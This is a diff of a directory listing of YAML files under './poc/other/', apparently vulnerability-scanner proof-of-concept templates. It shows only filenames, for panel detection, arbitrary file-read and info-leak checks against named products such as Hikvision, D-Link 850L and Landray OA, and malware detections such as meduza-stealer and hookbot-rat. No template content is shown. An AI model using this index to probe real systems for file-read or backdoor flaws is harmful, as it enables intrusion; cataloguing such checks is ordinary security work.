./poc/other/devformatter-4f0edd8cd8a7b5fcd66978824cc8f948.yaml @@ -60228,7 +60200,7 @@ ./poc/other/dialogs-plugin.yaml ./poc/other/dialogs.yaml ./poc/other/dian-diagnostics.yaml -./poc/other/diaowen-fileread(1).yaml +./poc/other/diaowen-fileread.yaml ./poc/other/diaowen-system.yaml ./poc/other/diary-31eb77eaefc61e112478e9f1952e822d.yaml ./poc/other/diary-9099a88f255af571eb05254581f8054d.yaml @@ -60267,6 +60239,7 @@ ./poc/other/diplomat-da700602e0176e1b1b6120899ff50989.yaml ./poc/other/diplomat.yaml ./poc/other/dir-contents-disc-logs-6999.yaml +./poc/other/dir-listing-7003.yaml ./poc/other/dir-listing-7004.yaml ./poc/other/dir-listing-7005.yaml ./poc/other/dir-listing-7007.yaml @@ -60397,9 +60370,11 @@ ./poc/other/dk-pricr-responsive-pricing-table-b16a43b12a77fac981f6dff5bee7fae6.yaml ./poc/other/dk-pricr-responsive-pricing-table-fcb02e31136900f66af826680ccfc854.yaml ./poc/other/dk-pricr-responsive-pricing-table.yaml +./poc/other/dlink-850l-info-leak-7035.yaml ./poc/other/dlink-850l-info-leak-7036.yaml ./poc/other/dlink-850l-info-leak-7037.yaml ./poc/other/dlink-850l-info-leak-7038.yaml +./poc/other/dlink-850l-info-leak-7039.yaml ./poc/other/dlink-850l-info-leak.yml ./poc/other/dlink-file-read.yaml ./poc/other/dlink-panel.yaml @@ -60408,7 +60383,6 @@ ./poc/other/dmxready-portfolio-manager.yaml ./poc/other/dnp-firewall.yaml ./poc/other/dns-multiple-example.yaml -./poc/other/dns-value-share-template-3.yaml ./poc/other/docebo-elearning-panel.yaml ./poc/other/docket-cache-29d289a525039ca1604e348c45bb194f.yaml ./poc/other/docket-cache-9d3b68fb0167e0f3e4bf3e86cef87a84.yaml @@ -60451,7 +60425,6 @@ ./poc/other/doko-theme.yaml ./poc/other/doko.yaml ./poc/other/dokuwiki-installer.yaml -./poc/other/dokuwiki-panel.yaml ./poc/other/dokuwiki.yaml ./poc/other/dolibarr-installer.yaml ./poc/other/dolibarr-panel.yaml @@ -60711,6 +60684,7 @@ ./poc/other/droit-elementor-addons-430c8b1464024c3ce26fa2faca084e29.yaml ./poc/other/droit-elementor-addons.yaml ./poc/other/drone-ci-panel-7090.yaml +./poc/other/drone-ci-panel-7091.yaml ./poc/other/drone-ci-panel.yaml ./poc/other/drone-ci-panel.yml ./poc/other/drop-shadow-boxes-19be81a9cc969d8ecc9f8b98996baee0.yaml @@ -60754,12 +60728,13 @@ ./poc/other/drugpak.yaml ./poc/other/druid-monitor-7100.yaml ./poc/other/druid-monitor-7101.yaml -./poc/other/druid-monitor-7103.yaml +./poc/other/druid-monitor-7102.yaml ./poc/other/druid-monitor-7104.yaml ./poc/other/druid-monitor.yaml ./poc/other/druid-panel.yaml ./poc/other/ds-site-message-875e5ff5a57ff63bfa2f151fee3c096b.yaml ./poc/other/ds-site-message.yaml +./poc/other/ds-store-file.yaml ./poc/other/ds-store-leak.yaml ./poc/other/ds-suit-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/ds-suit.yaml @@ -60781,6 +60756,7 @@ ./poc/other/dspace.yaml ./poc/other/dss-download-fileread-7116.yaml ./poc/other/dss-download-fileread-7117.yaml +./poc/other/dss-download-fileread.yaml ./poc/other/dsubscribers-74ac1eb0b977357b67ddd92eb354589f.yaml ./poc/other/dsubscribers-945733509c68d8720d9e8d2deb68c79f.yaml ./poc/other/dsubscribers-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -60923,8 +60899,7 @@ ./poc/other/dx-share-selection.yaml ./poc/other/dx-watermark-3bef3aced10727d0ec75e98bd1b40fca.yaml ./poc/other/dx-watermark.yaml -./poc/other/dxplanning-panel.yaml -./poc/other/dynamic-broadcast-receiver-7140.yaml +./poc/other/dynamic-broadcast-receiver-7141.yaml ./poc/other/dynamic-broadcast-receiver-7142.yaml ./poc/other/dynamic-broadcast-receiver.yaml ./poc/other/dynamic-content-for-elementor-74b47d0324febbea267a2d8f675a7149.yaml @@ -61110,6 +61085,7 @@ ./poc/other/easy-media-gallery-pro-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/easy-media-gallery-pro-listing-7150.yaml ./poc/other/easy-media-gallery-pro-listing-7151.yaml +./poc/other/easy-media-gallery-pro-listing-7152.yaml ./poc/other/easy-media-gallery-pro-listing-7153.yaml ./poc/other/easy-media-gallery-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/easy-media-gallery-pro-plugin.yaml @@ -61960,6 +61936,7 @@ ./poc/other/entrust-identityguard-1.yaml ./poc/other/entrust-identityguard-2.yaml ./poc/other/entrust-identityguard.yaml +./poc/other/env.yaml ./poc/other/envato-elements-1ca8761aad01c087e129c9ba5b7170f9.yaml ./poc/other/envato-elements.yaml ./poc/other/envialosimple-email-marketing-y-newsletters-gratis-61c9bb577c39ae281aa4842e613affa5.yaml @@ -61974,7 +61951,6 @@ ./poc/other/environment-rb.yaml ./poc/other/envision-gateway-7226.yaml ./poc/other/envision-gateway-7227.yaml -./poc/other/envision-gateway.yaml ./poc/other/envo-business-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/envo-business-709fcd2d01e6508e0448c347b88dab61.yaml ./poc/other/envo-business-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -62074,6 +62050,7 @@ ./poc/other/error-logs-7251.yaml ./poc/other/error-logs-7253.yaml ./poc/other/error-logs-7254.yaml +./poc/other/error-logs-7255.yaml ./poc/other/error-logs-7256.yaml ./poc/other/error-logs-8.yaml ./poc/other/error-logs-9.yaml @@ -62764,6 +62741,7 @@ ./poc/other/ezoic-integration-cce4dc27b5c66be86d956ad30a7a8970.yaml ./poc/other/ezoic-integration-cfe872c971b4228525dc363d4a798eb7.yaml ./poc/other/ezoic-integration.yaml +./poc/other/f-secure-policy-manager-7560.yaml ./poc/other/f-secure-policy-manager-7561.yaml ./poc/other/f-secure-policy-manager-7562.yaml ./poc/other/f-secure-policy-manager-7563.yaml @@ -62907,7 +62885,7 @@ ./poc/other/fathom-analytics.yaml ./poc/other/fatpipe-backdoor-7433.yaml ./poc/other/fatpipe-ipvpn-panel-7434.yaml -./poc/other/fatpipe-ipvpn-panel-7436.yaml +./poc/other/fatpipe-ipvpn-panel-7435.yaml ./poc/other/fatpipe-ipvpn-panel.yaml ./poc/other/fatpipe-mpvpn-panel.yaml ./poc/other/fatpipe-warp-panel.yaml @@ -63068,7 +63046,7 @@ ./poc/other/file-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/file-manager-plugin.yaml ./poc/other/file-manager.yaml -./poc/other/file-scheme-7468.yaml +./poc/other/file-scheme-7467.yaml ./poc/other/file-scheme-7469.yaml ./poc/other/file-scheme.yaml ./poc/other/filebird-61cf2f1a37771fa3cda817355d5faa22.yaml @@ -63098,6 +63076,7 @@ ./poc/other/filezilla-1.yaml ./poc/other/filezilla-2.yaml ./poc/other/filezilla-3.yaml +./poc/other/filezilla-7470.yaml ./poc/other/filezilla-7471.yaml ./poc/other/filezilla-phish.yaml ./poc/other/filezilla.yaml @@ -63774,6 +63753,7 @@ ./poc/other/formmail.yaml ./poc/other/formula-5b672e9f77cfd4654d3abf551473cec4.yaml ./poc/other/formula-b0133eeb83592f6bc091b8166dad158b.yaml +./poc/other/formula.yaml ./poc/other/forsun-科盾安全网关控制台.yaml ./poc/other/fortiadc-panel.yaml ./poc/other/fortiap-panel.yaml @@ -63785,7 +63765,6 @@ ./poc/other/fortinet-fortiddos-panel.yaml ./poc/other/fortinet-fortigate-panel-7534.yaml ./poc/other/fortinet-fortigate-panel-7535.yaml -./poc/other/fortinet-fortigate-panel-7536.yaml ./poc/other/fortinet-fortigate-panel.yaml ./poc/other/fortinet-fortigate.yaml ./poc/other/fortinet-fortiguard.yaml @@ -63825,7 +63804,6 @@ ./poc/other/fotography.yaml ./poc/other/fotomoto.yaml ./poc/other/foulenzer-advanced.yaml -./poc/other/foulenzer-subdomain-tk (copy 1).yaml ./poc/other/foulenzer-subdomain-tk.yaml ./poc/other/foulenzer-tech.yaml ./poc/other/founder-all-media-editing-system.yaml @@ -64388,7 +64366,7 @@ ./poc/other/geoserver.yaml ./poc/other/geotrust-cert.yaml ./poc/other/gerpgo-erp.yaml -./poc/other/gespage-panel-7605.yaml +./poc/other/gespage-panel-7606.yaml ./poc/other/gespage-panel.yaml ./poc/other/gespage-workflow.yaml ./poc/other/gestion-pymes-4e27f6575c1bbb81bb82fae9669ce875.yaml @@ -64406,7 +64384,6 @@ ./poc/other/get-env(1).yaml ./poc/other/get-env.yaml ./poc/other/get-iam-users.yaml -./poc/other/get-override-sni.yaml ./poc/other/get-query-string.yaml ./poc/other/get-site-to-phone-by-qr-code-53f9f187ffc31e706ad6ef27544d8f05.yaml ./poc/other/get-site-to-phone-by-qr-code.yaml @@ -64424,7 +64401,6 @@ ./poc/other/get-url-cron.yaml ./poc/other/get-without-scheme.yaml ./poc/other/get-your-number.yaml -./poc/other/get.yaml ./poc/other/getresponse-integration-e5d7fa71e6908442857a0cb0670fa481.yaml ./poc/other/getresponse-integration-fa4bcc5aa8ddc19efefa3934ed36cbc7.yaml ./poc/other/getresponse-integration.yaml @@ -64626,7 +64602,6 @@ ./poc/other/global-traffic-statistics.yaml ./poc/other/globalprotect-panel-1.yaml ./poc/other/globalprotect-panel-2.yaml -./poc/other/globalprotect-panel-7720.yaml ./poc/other/globalprotect-panel-7721.yaml ./poc/other/globalprotect-panel.yaml ./poc/other/globalsign-cert.yaml @@ -64641,11 +64616,10 @@ ./poc/other/glossary-by-codeat.yaml ./poc/other/glossword.yaml ./poc/other/glowroot-panel.yaml -./poc/other/glpi-directory-listing-7734.yaml +./poc/other/glpi-directory-listing.yaml ./poc/other/glpi-panel.yaml ./poc/other/glpi-workflow.yaml ./poc/other/glpi.yaml -./poc/other/glpidirectorylisting(1).yaml ./poc/other/glpidirectorylisting.yaml ./poc/other/gm-electronic-security-document-management-system.yaml ./poc/other/gm-woo-product-list-widget.yaml @@ -64685,7 +64659,7 @@ ./poc/other/gocodes.yaml ./poc/other/gocron-panel.yaml ./poc/other/gogs-panel.yaml -./poc/other/gogs-workflow.yaml +./poc/other/gogs-workflow-7760.yaml ./poc/other/gogs.yaml ./poc/other/golang-metrics.yaml ./poc/other/golangci-lint.yml @@ -64705,6 +64679,7 @@ ./poc/other/good-bad-comments-83f695fbf2f9017dee2e874c9671786d.yaml ./poc/other/good-bad-comments.yaml ./poc/other/good10000-tios.yaml +./poc/other/goodjob-dashboard.yaml ./poc/other/goodnews5-8ed36f6d7d78831e7535c4c75cee15dc.yaml ./poc/other/goodnews5.yaml ./poc/other/goodnex-78042e81e14608c6a526568b143d60ec.yaml @@ -64986,7 +64961,6 @@ ./poc/other/gzmwiccard-system.yaml ./poc/other/gzqxrh-system.yaml ./poc/other/gzsa-intranet-security.yaml -./poc/other/h2console-panel-7866.yaml ./poc/other/h2console-panel.yaml ./poc/other/h2csmuggle-nuclei.yaml ./poc/other/h2o-arbitary-file-read.yaml @@ -65008,11 +64982,11 @@ ./poc/other/h5p-css-editor.yaml ./poc/other/h5s-video-platform.yaml ./poc/other/h_ui.yaml -./poc/other/hack5-cloud-c2.yaml ./poc/other/hadoop-administration.yaml ./poc/other/hadoop-hue.yaml ./poc/other/haidaoshop.yaml ./poc/other/haitian-oa.yaml +./poc/other/haivision-gateway-panel.yaml ./poc/other/haivision-media-platform-panel.yaml ./poc/other/hal.yaml ./poc/other/hana-flv-player-7efa2a93c8c5a4eedc90aba0cfaa5f36.yaml @@ -65025,7 +64999,6 @@ ./poc/other/hanmasoft.yaml ./poc/other/hanming-lfr-7879.yaml ./poc/other/hanming-lfr-7880.yaml -./poc/other/hanming-lfr.yaml ./poc/other/hanna-drawing-service.yaml ./poc/other/hanwei-hazardous-chemicals-enterprise-early-warning-and-prevention-system.yaml ./poc/other/hanwei-integrated-business-platform.yaml @@ -65074,7 +65047,7 @@ ./poc/other/haproxy-status-7884.yaml ./poc/other/haproxy-status-7885.yaml ./poc/other/harbor-panel.yaml -./poc/other/harbor-workflow-7889.yaml +./poc/other/harbor-workflow.yaml ./poc/other/harbor.yaml ./poc/other/hash-elements-af3a85220968d357a0b931aa85d349a0.yaml ./poc/other/hash-elements-b3ac5ca2a781339a6e0e0f54ca2836eb.yaml @@ -65148,7 +65121,6 @@ ./poc/other/heat-trackr.yaml ./poc/other/heatmiser-wifi-thermostat-7923.yaml ./poc/other/heatmiser-wifi-thermostat-7924.yaml -./poc/other/heatmiser-wifi-thermostat.yaml ./poc/other/hejia-oa.yaml ./poc/other/hello-dolly.yaml ./poc/other/hello-elementor-4871f7fef9821ad7021876ca49006f78.yaml @@ -65226,7 +65198,7 @@ ./poc/other/hikvision-gateway-data-file-read.yaml ./poc/other/hikvision-iSecureCenter-fileread.yaml ./poc/other/hikvision-info-leak-7957.yaml -./poc/other/hikvision-info-leak-7958.yaml +./poc/other/hikvision-info-leak.yaml ./poc/other/hikvision-info-leak.yml ./poc/other/hikvision-ip-camera.yaml ./poc/other/hikvision-isecure-center.yaml @@ -65253,7 +65225,7 @@ ./poc/other/hitachi-virtual-storage-platform.yaml ./poc/other/hitron-technologies-7959.yaml ./poc/other/hitron-technologies-7960.yaml -./poc/other/hitron-technologies-7962.yaml +./poc/other/hitron-technologies-7961.yaml ./poc/other/hitron-technologies.yaml ./poc/other/hitsteps-visitor-manager-a4f14bcf46b90bf05fd86abc01d72e3e.yaml ./poc/other/hitsteps-visitor-manager-fc2fce71ebba70ebb2a3e464a40cd489.yaml @@ -65262,7 +65234,6 @@ ./poc/other/hivequeue-agent.yaml ./poc/other/hjtcloud-arbitrary-file-read-1.yaml ./poc/other/hjtcloud-arbitrary-file-read-2.yaml -./poc/other/hjtcloud-arbitrary-file-read-7967.yaml ./poc/other/hjtcloud-arbitrary-file-read-7968.yaml ./poc/other/hjtcloud-arbitrary-file-read-7969.yaml ./poc/other/hjtcloud-arbitrary-file-read-7970.yaml @@ -65272,10 +65243,10 @@ ./poc/other/hjtcloud-arbitrary-fileread.yml ./poc/other/hjtcloud-directory-file-leak.yaml ./poc/other/hjtcloud-directory-file-leak.yml -./poc/other/hjtcloud-rest-arbitrary-file-read-7973.yaml ./poc/other/hjtcloud-rest-arbitrary-file-read-7974.yaml ./poc/other/hjtcloud-rest-arbitrary-file-read-7975.yaml ./poc/other/hjtcloud-rest-arbitrary-file-read-7976.yaml +./poc/other/hjtcloud-rest-arbitrary-file-read.yaml ./poc/other/hjtcloud.yaml ./poc/other/hk-exif-tags-90d5c188e560ef7cd488e47fb557949a.yaml ./poc/other/hk-exif-tags.yaml @@ -65288,7 +65259,7 @@ ./poc/other/hmapsprem.yaml ./poc/other/hmc-hybris-panel-1.yaml ./poc/other/hmc-hybris-panel-2.yaml -./poc/other/hmc-hybris-panel-7977.yaml +./poc/other/hmc-hybris-panel-7978.yaml ./poc/other/hmc-hybris-panel.yaml ./poc/other/hmc.yaml ./poc/other/hmo.yaml @@ -65336,7 +65307,7 @@ ./poc/other/honeypress-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/honeypress-theme.yaml ./poc/other/honeypress.yaml -./poc/other/honeywell-building-control-7988.yaml +./poc/other/honeywell-building-control-7987.yaml ./poc/other/honeywell-building-control.yaml ./poc/other/honeywell-intermec-easylan.yaml ./poc/other/hookbot-rat.yaml @@ -65399,15 +65370,16 @@ ./poc/other/hover-image-e58166fa5204a405e1e321e94bba66de.yaml ./poc/other/hover-image.yaml ./poc/other/hp-3com-officeconnect-vpn-firewall.yaml +./poc/other/hp-ilo-5-8018.yaml ./poc/other/hp-ilo-5-8019.yaml -./poc/other/hp-ilo-5-8021.yaml +./poc/other/hp-ilo-5-8020.yaml ./poc/other/hp-ilo-5.yaml ./poc/other/hp-ilo.yaml ./poc/other/hp-pjl.yaml ./poc/other/hp-service-manager-1.yaml ./poc/other/hp-service-manager-2.yaml -./poc/other/hp-service-manager-8032.yaml ./poc/other/hp-service-manager-8033.yaml +./poc/other/hp-service-manager-8034.yaml ./poc/other/hp-service-manager.yaml ./poc/other/hp-sitescope.yaml ./poc/other/hp-system-management.yaml @@ -65421,7 +65393,6 @@ ./poc/other/hpe-officeconnect-switch-1920s-24g.yaml ./poc/other/hpe-system-management-anonymous-8011.yaml ./poc/other/hpe-system-management-anonymous-8012.yaml -./poc/other/hpe-system-management-anonymous-8013.yaml ./poc/other/hpe-system-management-anonymous.yaml ./poc/other/hphu-system.yaml ./poc/other/hqtheme-extra-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -65534,7 +65505,6 @@ ./poc/other/huawei-fusioncloud-desktop.yaml ./poc/other/huawei-fusioncompute.yaml ./poc/other/huawei-hg532e-panel-8065.yaml -./poc/other/huawei-hg532e-panel-8066.yaml ./poc/other/huawei-hg532e-panel.yaml ./poc/other/huawei-home-gateway-hg659-fileread.yaml ./poc/other/huawei-home-gateway-hg659-fileread.yml @@ -65566,6 +65536,7 @@ ./poc/other/huijietong-cloud-fileread-8084.yaml ./poc/other/huijietong-cloud-fileread-8085.yaml ./poc/other/huijietong-cloud-fileread-8087.yaml +./poc/other/huijietong-cloud-fileread.yaml ./poc/other/hummingbird-performance-1d4c893623ab0507c01647e1f1aef048.yaml ./poc/other/hummingbird-performance-3a7dcccc0d3fd5b9007fbcfe6711c67b.yaml ./poc/other/hummingbird-performance-67c4fcbf9696836879ccf2ec7679be61.yaml @@ -65699,9 +65670,7 @@ ./poc/other/identity-services-engine-2.yaml ./poc/other/identity-services-engine-8144.yaml ./poc/other/identity-services-engine-8145.yaml -./poc/other/identity-services-engine-8146.yaml ./poc/other/identity-services-engine.yaml -./poc/other/identityguard-selfservice-entrust-8142.yaml ./poc/other/identityguard-selfservice-entrust-8143.yaml ./poc/other/identityguard-selfservice-entrust.yaml ./poc/other/idonate-1ace5675b1d0e0c2c55b706529d8c6a1.yaml @@ -65973,7 +65942,6 @@ ./poc/other/imember360-fce3384b02a0b62b23a0533f7a66b6ca.yaml ./poc/other/imember360.yaml ./poc/other/imgallery.yaml -./poc/other/immich-panel.yaml ./poc/other/immopress-05c0761516bb8673f0817e0b7a55920e.yaml ./poc/other/immopress-185eb97d063feb8cfaf2be977bbfee57.yaml ./poc/other/immopress-5b8d08519480af5e15ca32c661720ed8.yaml @@ -66317,7 +66285,7 @@ ./poc/other/interactive-world-maps-fcdf26721454bc7cbb87f06418e98ace.yaml ./poc/other/interactive-world-maps.yaml ./poc/other/interactivevirtualshipdisplaysystem.yaml -./poc/other/interactsh-server-8165.yaml +./poc/other/interactsh-server.yaml ./poc/other/interactsh-stop-at-first-match.yaml ./poc/other/interactsh.yaml ./poc/other/interactsoftware-interact.yaml @@ -66341,7 +66309,7 @@ ./poc/other/internet-cluster-manager.yaml ./poc/other/internet-service-8176.yaml ./poc/other/internet-service-8177.yaml -./poc/other/internet-service.yaml +./poc/other/internet-service-8178.yaml ./poc/other/interred.yaml ./poc/other/interstingExtensions.yaml ./poc/other/intimate-io-cryptocurrency-payments-4a3a4bb7607630077f49d04dfa8de691.yaml @@ -66406,8 +66374,8 @@ ./poc/other/iomega-emc-shared-nas.yaml ./poc/other/ioncube-loader-wizard-1.yaml ./poc/other/ioncube-loader-wizard-2.yaml -./poc/other/ioncube-loader-wizard-8184.yaml ./poc/other/ioncube-loader-wizard-8185.yaml +./poc/other/ioncube-loader-wizard.yaml ./poc/other/ios-app-insecure-function.yaml ./poc/other/ios-app-min-ios.yaml ./poc/other/ios-app-permission-given.yaml @@ -66528,7 +66496,7 @@ ./poc/other/ithemes2.yaml ./poc/other/itop-panel-1.yaml ./poc/other/itop-panel-2.yaml -./poc/other/itop-panel-8204.yaml +./poc/other/itop-panel-8205.yaml ./poc/other/itop-panel.yaml ./poc/other/itop-workflow.yaml ./poc/other/iva-business-hours-pro-d4d29007dd18d8c7d97cfa243985305a.yaml @@ -66545,7 +66513,6 @@ ./poc/other/jaeger-ui-dashboard.yaml ./poc/other/jakarta-project.yaml ./poc/other/jamf-panel-8215.yaml -./poc/other/jamf-panel-8216.yaml ./poc/other/jamf-panel-8217.yaml ./poc/other/jamf-panel.yaml ./poc/other/jamf-pro-log4j.yaml @@ -66726,7 +66693,6 @@ ./poc/other/jfrog-8303.yaml ./poc/other/jfrog-8304.yaml ./poc/other/jfrog-8305.yaml -./poc/other/jfrog-8306.yaml ./poc/other/jfrog.yaml ./poc/other/jh-404-logger.yaml ./poc/other/jianhengxinan-jh-las.yaml @@ -66752,7 +66718,6 @@ ./poc/other/jivochat-66d916ce8710707a6a59f9da36d85732.yaml ./poc/other/jivochat.yaml ./poc/other/jixian-oa-video-file-file-read.yaml -./poc/other/jkstatus-manager-8344.yaml ./poc/other/jkstatus-manager-8345.yaml ./poc/other/jkstatus-manager-8346.yaml ./poc/other/jkstatus-manager-8347.yaml @@ -66762,7 +66727,7 @@ ./poc/other/jmx-console-8348.yaml ./poc/other/jmx-console-8349.yaml ./poc/other/jmx-console-8350.yaml -./poc/other/jmx-console-8352.yaml +./poc/other/jmx-console-8351.yaml ./poc/other/jmx-console.yaml ./poc/other/jnews-edf2392b68ac3fa89210511685b2df12.yaml ./poc/other/jnews.yaml @@ -66843,10 +66808,10 @@ ./poc/other/joliprint-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/joliprint-plugin.yaml ./poc/other/joliprint.yaml -./poc/other/jolokia-8367.yaml ./poc/other/jolokia-8368.yaml +./poc/other/jolokia-8369.yaml ./poc/other/jolokia-file-read-compilerdirectivesadd.yaml -./poc/other/jolokia-list-8360.yaml +./poc/other/jolokia-list-8361.yaml ./poc/other/jolokia-list.yaml ./poc/other/jolokia.yaml ./poc/other/jonradio-private-site-e2ec9bf6240f7a69f44d8e270b286828.yaml @@ -67118,6 +67083,7 @@ ./poc/other/kingosoft.yaml ./poc/other/kingsoft-duba-enterprise.yaml ./poc/other/kingsoft-v8-file-read-8491.yaml +./poc/other/kingsoft-v8-file-read.yaml ./poc/other/kingsoft-v8-file-read.yml ./poc/other/kingsoft-v8-get-file-content-file-read.yaml ./poc/other/kinpan-wechat-getsysteminfo-fileread.yaml @@ -67245,8 +67211,10 @@ ./poc/other/kraken-image-optimizer.yaml ./poc/other/kuaipu-m6.yaml ./poc/other/kubelet-healthz-8518.yaml +./poc/other/kubelet-healthz.yaml ./poc/other/kubelet-metrics-8520.yaml ./poc/other/kubelet-pods-8522.yaml +./poc/other/kubelet-pods-8523.yaml ./poc/other/kubelet-runningpods-8524.yaml ./poc/other/kubelet-runningpods-8525.yaml ./poc/other/kubelet-scan.yaml @@ -67331,7 +67299,7 @@ ./poc/other/landray-oa-fileread-1.yaml ./poc/other/landray-oa-fileread-2.yaml ./poc/other/landray-oa-fileread-8569.yaml -./poc/other/landray-oa-fileread-8570.yaml +./poc/other/landray-oa-fileread-8571.yaml ./poc/other/landray-oa-fileread.yaml ./poc/other/landray-oa-panel.yaml ./poc/other/landray-oa.yaml @@ -67895,6 +67863,7 @@ ./poc/other/liveview-axis-camera-8645.yaml ./poc/other/liveview-axis-camera-8646.yaml ./poc/other/liveview-axis-camera-8647.yaml +./poc/other/liveview-axis-camera-8648.yaml ./poc/other/livezilla.yaml ./poc/other/lkpoweroa.yaml ./poc/other/lnmp.yaml @@ -67937,7 +67906,6 @@ ./poc/other/lock-my-bp.yaml ./poc/other/lock-user-account-b0aab06581594218d3d4015ad48e97b2.yaml ./poc/other/lock-user-account.yaml -./poc/other/lockself-panel.yaml ./poc/other/loco-translate-d8ad8e1d028bc532b0481b9aa228babc.yaml ./poc/other/loco-translate-e42bcd2e4f84582af8fdd8441a0a5b15.yaml ./poc/other/loco-translate.yaml @@ -67994,7 +67962,7 @@ ./poc/other/lotus-domino-version-7.yaml ./poc/other/lotus-domino-version-8655.yaml ./poc/other/lotus-domino-version-8656.yaml -./poc/other/lotus-domino-version-8657.yaml +./poc/other/lotus-domino-version.yaml ./poc/other/lotus-domino-workflow.yaml ./poc/other/lovetravel-23e1aaa9c3f9ff0df0ea74cdaffa6f35.yaml ./poc/other/lovetravel-42490e299390004a5c2f5515978038b5.yaml @@ -68012,7 +67980,7 @@ ./poc/other/lpse.yaml ./poc/other/lucee-stack-trace-8666.yaml ./poc/other/lucee-stack-trace-8667.yaml -./poc/other/lucee-stack-trace-8669.yaml +./poc/other/lucee-stack-trace-8668.yaml ./poc/other/lucee-stack-trace-8670.yaml ./poc/other/lucee-stack-trace.yaml ./poc/other/lucee-workflow.yaml @@ -68479,6 +68447,7 @@ ./poc/other/manageengine-adaudit-8727.yaml ./poc/other/manageengine-adaudit-8728.yaml ./poc/other/manageengine-adaudit-8729.yaml +./poc/other/manageengine-adaudit-8730.yaml ./poc/other/manageengine-adaudit.yaml ./poc/other/manageengine-admanager-plus.yaml ./poc/other/manageengine-adselfservice-8734.yaml @@ -68494,40 +68463,37 @@ ./poc/other/manageengine-analytics.yaml ./poc/other/manageengine-apex-helpdesk-8744.yaml ./poc/other/manageengine-apex-helpdesk-8745.yaml -./poc/other/manageengine-apex-helpdesk-8746.yaml ./poc/other/manageengine-apex-helpdesk-8747.yaml +./poc/other/manageengine-apex-helpdesk-8748.yaml ./poc/other/manageengine-apex-helpdesk.yaml ./poc/other/manageengine-applications-manager-8749.yaml ./poc/other/manageengine-applications-manager-8750.yaml -./poc/other/manageengine-applications-manager-8751.yaml ./poc/other/manageengine-applications-manager-8752.yaml +./poc/other/manageengine-applications-manager-8753.yaml ./poc/other/manageengine-applications-manager.yaml ./poc/other/manageengine-assetexplorer-8754.yaml ./poc/other/manageengine-assetexplorer-8755.yaml ./poc/other/manageengine-assetexplorer-8756.yaml ./poc/other/manageengine-assetexplorer-8757.yaml -./poc/other/manageengine-assetexplorer-8758.yaml ./poc/other/manageengine-assetexplorer.yaml ./poc/other/manageengine-desktop-8759.yaml ./poc/other/manageengine-desktop-8760.yaml ./poc/other/manageengine-desktop-8761.yaml ./poc/other/manageengine-desktop-8762.yaml -./poc/other/manageengine-desktop-8763.yaml ./poc/other/manageengine-desktop.yaml ./poc/other/manageengine-deviceexpert.yaml ./poc/other/manageengine-opmanager-8765.yaml ./poc/other/manageengine-opmanager-8766.yaml -./poc/other/manageengine-opmanager-8768.yaml +./poc/other/manageengine-opmanager-8767.yaml ./poc/other/manageengine-opmanager.yaml ./poc/other/manageengine-servicedesk-8769.yaml ./poc/other/manageengine-servicedesk-8770.yaml -./poc/other/manageengine-servicedesk-8772.yaml +./poc/other/manageengine-servicedesk-8771.yaml ./poc/other/manageengine-servicedesk.yaml ./poc/other/manageengine-supportcenter-8773.yaml ./poc/other/manageengine-supportcenter-8774.yaml ./poc/other/manageengine-supportcenter-8775.yaml ./poc/other/manageengine-supportcenter-8776.yaml -./poc/other/manageengine-supportcenter-8777.yaml ./poc/other/manageengine-supportcenter.yaml ./poc/other/management-platform.yaml ./poc/other/manager-for-icomoon-bd940fb4a831b1d84ffa6919c78aa820.yaml @@ -68694,9 +68660,10 @@ ./poc/other/masterslider-c46ad9c96b3bae8c9262c789daeaf300.yaml ./poc/other/masterslider-c5ebf93bb1fa8648a19209f9e766560c.yaml ./poc/other/masterslider.yaml +./poc/other/match-1.yaml ./poc/other/match-2.yaml ./poc/other/matcher-name.yaml -./poc/other/matcher-with-or.yaml +./poc/other/matcher-with-and.yaml ./poc/other/material-design-for-contact-form-7-597cb0aecccef3143168fab5a0d89442.yaml ./poc/other/material-design-for-contact-form-7.yaml ./poc/other/material-design-icons-for-elementor-1c9f19cd946316d37ce9901dd35cdcc3.yaml @@ -68853,7 +68820,6 @@ ./poc/other/medikaid.yaml ./poc/other/mediumishh-19c1c4f9afd2e03ab8ba7593c492e379.yaml ./poc/other/mediumishh.yaml -./poc/other/meduza-stealer.yaml ./poc/other/medzone-lite-66ba1859ab560343222a23f4bdd2510b.yaml ./poc/other/medzone-lite-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/medzone-lite.yaml @@ -69039,11 +69005,13 @@ ./poc/other/metabase-panel.yaml ./poc/other/metabase-workflow.yaml ./poc/other/metabase.yaml +./poc/other/metadata-alibaba-8807.yaml ./poc/other/metadata-alibaba-8808.yaml ./poc/other/metadata-alibaba-8809.yaml -./poc/other/metadata-azure-8813.yaml ./poc/other/metadata-azure-8814.yaml ./poc/other/metadata-azure-8815.yaml +./poc/other/metadata-azure.yaml +./poc/other/metadata-hetzner-8822.yaml ./poc/other/metadata-hetzner-8823.yaml ./poc/other/metadata-hetzner-8824.yaml ./poc/other/metadata-hetzner.yaml @@ -69152,7 +69120,7 @@ ./poc/other/mihdan-public-post-preview.yaml ./poc/other/mihdan-yandex-turbo-feed-3030e2134ed915813a2b4ae0f6b9bf3a.yaml ./poc/other/mihdan-yandex-turbo-feed.yaml -./poc/other/mikrotik-graph-8870.yaml +./poc/other/mikrotik-graph-8871.yaml ./poc/other/mikrotik-graph-8872.yaml ./poc/other/mikrotik-graph.yaml ./poc/other/mikrotik-routeros-8873.yaml @@ -69196,7 +69164,7 @@ ./poc/other/mini-mail-dashboard-widget.yaml ./poc/other/mini-start-page-1.yaml ./poc/other/mini-start-page-2.yaml -./poc/other/mini-start-page-8896.yaml +./poc/other/mini-start-page-8895.yaml ./poc/other/mini-start-page.yaml ./poc/other/minibb.yaml ./poc/other/minify-html-markup-a293a046a898b27e361e4977cf2a329c.yaml @@ -69335,6 +69303,7 @@ ./poc/other/mobilechief-mobile-site-creator-plugin.yaml ./poc/other/mobilechief-mobile-site-creator.yaml ./poc/other/mobileiron-mdm.yaml +./poc/other/mobileiron-sentry.yaml ./poc/other/mobileiron-workflow.yaml ./poc/other/mobileiron.yaml 